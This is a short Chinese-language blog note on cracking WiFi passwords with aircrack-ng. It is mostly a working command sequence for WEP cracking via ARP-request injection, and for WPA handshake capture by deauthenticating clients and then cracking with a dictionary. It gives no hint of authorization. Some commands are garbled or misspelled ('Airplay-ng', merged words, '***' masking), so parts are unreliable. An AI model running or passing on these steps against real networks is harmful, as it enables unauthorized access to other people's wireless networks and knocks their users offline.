wifi破解之a(chǎn)ircrack工具使用方法整理

Aircrack-ng 個(gè)人感覺算是一款超好用的wifi破解工具了，尤其是前幾年，那個(gè)時(shí)候的路由器只有wep和wpa ，對(duì)于這兩種的，破解效率應(yīng)該是很高，只是不知道對(duì)于wpa2的破解效率如何，按照原理來講，應(yīng)該是很難在短時(shí)間破解，我對(duì)破解興趣不高，不過還是該記下來，最近剛好在網(wǎng)上看到一個(gè)好的教程，我就摘一些精華部分做個(gè)筆記。

以下是wep破解過程：

Ifconfigwlan0 up 掛載無線網(wǎng)卡

Airmon-ngstart wlan0 激活無線網(wǎng)卡為監(jiān)聽模式

Airodump-ngmon0抓包

Airodump-ng –ivs –w shujubao –c 6 wlan0 抓包并保存

--ivs 這里是設(shè)置過濾，只保存用于破解的ivs文件，可以不加這個(gè)參數(shù)的，信道是多少寫多少，一般是6，這個(gè)可以在抓包的時(shí)候看到，這一步可能會(huì)抓到好幾個(gè)路由器的報(bào)文，選擇自己要的就是了。

Airplay-ng -3 –b 目標(biāo)MAC –h 客戶端MAC mon0

-3是指采用arprequesr注入***模式（后面會(huì)提到參數(shù)0）

等待一段時(shí)間，具體等多少，就是等1000個(gè)以上的數(shù)據(jù)包吧，保險(xiǎn)可以多等一會(huì)

Aircrack-ng shujubao-01.ivs 進(jìn)行破解了，這種模式好破，當(dāng)然拿windows下面破利用GPU加速更快。

Wpa加密破解：

前面都一樣抓包的時(shí)候使用如下命令：

Airodump-ng -c 6 –w shujubao mon0

Aireplay-ng -0 10 –a 目標(biāo)MAC –c 客戶端MAC wlan0（參數(shù)與WEP有很大不同）

-0采用deauth***模式，后面是***次數(shù)，一般1次有效就好了。

屏幕上出現(xiàn)了：WPA handshake說明抓到了握手包

Aircrack-ng –w dic shujubao-01.cap

這里面需要自己制作字典，建議在win下面破解，字典工具也多，自己做一個(gè)就好了。也可以扔到網(wǎng)站上破解，他們應(yīng)該有超大的彩虹表吧，個(gè)人感覺對(duì)于復(fù)雜的wpa2密碼，這種***方式不是很好用，運(yùn)氣不好，要破幾個(gè)月也是有可能，當(dāng)然我沒有驗(yàn)證，懶。不過這種方法確實(shí)是萬能的，限制條件不多。